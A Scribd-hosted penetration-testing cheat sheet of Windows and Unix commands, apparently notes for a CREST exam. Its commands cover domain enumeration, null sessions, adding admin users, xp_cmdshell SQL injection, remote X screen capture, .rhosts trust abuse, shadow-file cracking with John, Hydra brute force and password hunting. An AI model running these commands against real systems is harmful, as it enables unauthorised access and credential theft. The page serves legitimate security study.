[go: up one dir, main page]
Scribd
Upload
61 views3 pages

CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Uploaded by

fabien.yvan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
61 views3 pages

CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Uploaded by

fabien.yvan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Windows –

Domain: Comment
net view list computers on domain
net view \\<target name/ip> list shares on host
net view /domain list domains
net view /domain:<domain name> list computers on named domain
net user edward williams /add add a user
net localgroup Administrators edward /add add to administrators group
nbtscan 192.168.226.0/24 Scans smb domain

Domain Controllers: Comment


nltest /dclist:<domain name> Domain controllers
nltest /dsgetdc:<domain name> /pdc More pdc info
nltest /bdc_query:<domain name> bdc info (if any)
nltest /server:<ip> /trusted_domains Need null share

Hosts: Comment
net use \\<target>\ipc$ “” /u:”” null session
nbtstat -a <name> / -A <ip> netbios name table and target mac
epdump <target> look for ips in endpoints
enum -SUPc enum shares/users/password policy

SQL: Comment
‘;Exec xp_cmdshell ‘net user <user> beware of password complexity
<passwd> /add’;-- issues

sp_configure 'show advanced options', 1 set advanced options then use


reconfigure
next statement:
sp_configure 'xp_cmdshell', 1
reconfigure this will re-enable xp_cmdshell if
turned off

Windows Misc: Comment


dir filename /s Find file called filename and all sub
dirs
findstr /S /I “password” *.txt Find all occurrences of password in
or text files
findstr /S /I /M “password” *.txt (just
print files)
psexec \\192.168.0.1 -s cmd.exe Null session first
Tasklist /?
Tasklist /svc
Tasklist /FI "USERNAME eq NT AUTHORITY\
SYSTEM" /SVC

Then

Sc qc <servicename>

Ed – CREST Notes
Linux / Unix -

NFS: Comment
showmount -e <target> displays exports
sudo mount -t nfs <target>:/<export> don’t forget to mkdir mount point
<mount point>
adduser --uid <uid> –-gid <gid> <username> note password policy on local (+6
chars)

su - <user> and ssh-keygen Switch and gen keys for ssh


X Comment
xwininfo -tree -root -display <ip>:0 | will pipe back hex value for
grep -i term window
xwd –root -display <ip>:0.0 | xwud capture screen
xwd -id <hex value> -display <ip>:0 | xwud capture specific screen
xkill -display <ip>:0 kill process/window
x-dumper.sh

SCP: Comment
scp file ed@ninja:/home/ed copy file to ninja
scp ed@ninja:/home/ed/file file copy file from ninja

Putty Copy: Comment


pscp.exe Copy from ssh host to c:\
ed@192.168.226.162:/home/ed/Desktop/test.txt c:\

Finger: Comment
finger -l @target, 0@tаrget, .@tаrget, **@tаrget long list
finger (user, admin, ..)@target various flaws in finger
finger '1 2 3 4 5 6 7 8 9 0'@target Solaris 8 Bug

R Services: Comment
echo + + > /usr/bin/.rhosts – look in users home dir
check /etc/hosts.equiv

John Comment
unshadow /etc/passwd /etc/shadow > file Change /etc/john/john.conf
john –i:mode file to match min passwd req.
john –wordlist=words.txt file

hydra Comment
hydra –e ns –l user –P words.txt –v <ip> smb bash it

Unix Misc: Comment


find . -type f -name *payroll* Solaris find file names

Ed – CREST Notes
2>/dev/null (case sensitive)

find . -type f | grep -i 'Payroll'


2>/dev/null (case insensitive)
find . -type f -exec grep -i -l Solaris find file content
'Payroll' '{}' \; 2>/dev/null
find / -type f –iname ‘*Payroll*’ Linux find file names
2>/dev/null
grep –i –l –r whatever * 2>/dev/null Linux find file contents

find / -type f –exec grep –i –l Find files


“password” ‘{}’ \; 2>/dev/null
Or
grep –i –l ‘password’ *

find / -type f -print | grep -i "passwd" Solaris find case insensitive


2>/dev/null
find / -type f \( –perm -04000 -o –perm SUID / SGID (-o)
-02000 \) 2>/dev/null
find / -type f –perm -002 Word writable
showrev –p, uname –a, pkginfo -x Solaris patch info
netstat –nap – list processes and ports
(needs sudo)
lsof –i :port
lsof –p <pid> -P (-P gives port)
ps –ef (list processes)

export PATH=$PATH:/whatever ( bash) Add path in BASH/sh shell – valid


for terminal session only
PATH=$PATH:/whatever
export PATH ( sh )

Network Mapping Comment


dig @<nameserver> <domain name> axfr Zone transfer
traceroute <target> Default udp (-I ICMP, -T TCP, default
port 80).
ping -R <target> Record route, read from bottom up.

Ed – CREST Notes

You might also like